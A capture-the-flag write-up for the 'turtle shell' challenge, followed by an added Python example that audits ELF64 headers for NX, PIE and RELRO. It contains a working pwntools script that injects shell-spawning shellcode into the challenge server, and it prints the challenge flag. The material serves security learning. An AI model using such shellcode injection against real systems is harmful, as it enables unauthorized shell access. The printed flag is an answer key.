turtle shell

simple shellcode

Problem

Description

A turtle without its shell is a sad sight to see

Connect via: nc turtle.sdc.tf 1337

Solution

This is a simple, straightforward shellcode injection, as implied by the name and by the fact that none of the protections are enabled.

The program simply takes our input and runs it as code, so we can use pwntools' shellcraft to spawn a shell.

decompiled main
Solve.py
#!/usr/bin/python3
from pwn import *

# =========================================================
#                          SETUP                         
# =========================================================
exe = './turtle-shell'
context.binary = ELF(exe, checksec=True)
context.log_level = 'debug'

local = False
if(local):
    io = process(exe)
else:
    io = remote('turtle.sdc.tf', 1337)

# =========================================================
#                         ADDRESSES
# =========================================================


# =========================================================
#                         EXPLOITS
# =========================================================

shellcode = asm(shellcraft.sh())

# flatten the payload here
payload = flat([
    shellcode,
])

io.sendline(payload)

io.interactive()
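
The statement that none of the protections are enabled can be verified from the ELF headers themselves. The following is an added example, not part of the original writeup: a checksec-style audit of NX, PIE and RELRO for a little-endian ELF64 file, where `audit_elf64`, `build_sample` and the two sample images are names and inputs constructed for illustration.

```python
import struct

PT_GNU_STACK, PT_GNU_RELRO = 0x6474E551, 0x6474E552  # program header types
PF_X, ET_DYN = 0x1, 3
EHDR, PHDR = "<16sHHIQQQIHHHHHH", "<IIQQQQQQ"         # ELF64 little-endian layouts


def audit_elf64(data: bytes) -> dict:
    """Report NX, PIE and RELRO for a little-endian ELF64 image."""
    if data[:4] != b"\x7fELF" or data[4:6] != b"\x02\x01":
        raise ValueError("not a little-endian ELF64 file")
    fields = struct.unpack_from(EHDR, data, 0)
    e_type, e_phoff, e_phentsize, e_phnum = fields[1], fields[5], fields[9], fields[10]
    nx = relro = False  # a missing PT_GNU_STACK is treated as NX off (conservative)
    for i in range(e_phnum):
        p_type, p_flags = struct.unpack_from("<II", data, e_phoff + i * e_phentsize)
        if p_type == PT_GNU_STACK:
            nx = not (p_flags & PF_X)   # stack mapped without execute permission
        elif p_type == PT_GNU_RELRO:
            relro = True                # partial or full; full also needs BIND_NOW
    # ET_DYN is also used by shared objects, so "pie" assumes an executable was given
    return {"nx": nx, "pie": e_type == ET_DYN, "relro": relro}


def build_sample(e_type: int, phdrs: list) -> bytes:
    """Constructed input: an ELF64 header followed only by program headers."""
    ident = b"\x7fELF\x02\x01\x01" + bytes(9)
    ehdr = struct.pack(EHDR, ident, e_type, 62, 1, 0, 64, 0, 0, 64, 56, len(phdrs), 0, 0, 0)
    return ehdr + b"".join(struct.pack(PHDR, t, f, 0, 0, 0, 0, 0, 16) for t, f in phdrs)


# Constructed samples: a build with no mitigations and a hardened one
WEAK = build_sample(2, [(PT_GNU_STACK, 7)])                          # ET_EXEC, RWX stack
HARDENED = build_sample(3, [(PT_GNU_STACK, 6), (PT_GNU_RELRO, 4)])   # ET_DYN, RW stack

if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:   # audit a real file given on the command line
        with open(sys.argv[1], "rb") as fh:
            print(sys.argv[1], audit_elf64(fh.read()))
    else:
        print("weak    ", audit_elf64(WEAK))
        print("hardened", audit_elf64(HARDENED))
```

A clean result from these header checks does not cover a program that deliberately maps a writable and executable buffer at run time, so the audit complements a code review instead of replacing it.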

Flag

sdctf{w0w_y0u_m4d3_7h3_7urT13_c0m3_0u7_0f_1t5_5h3l1}
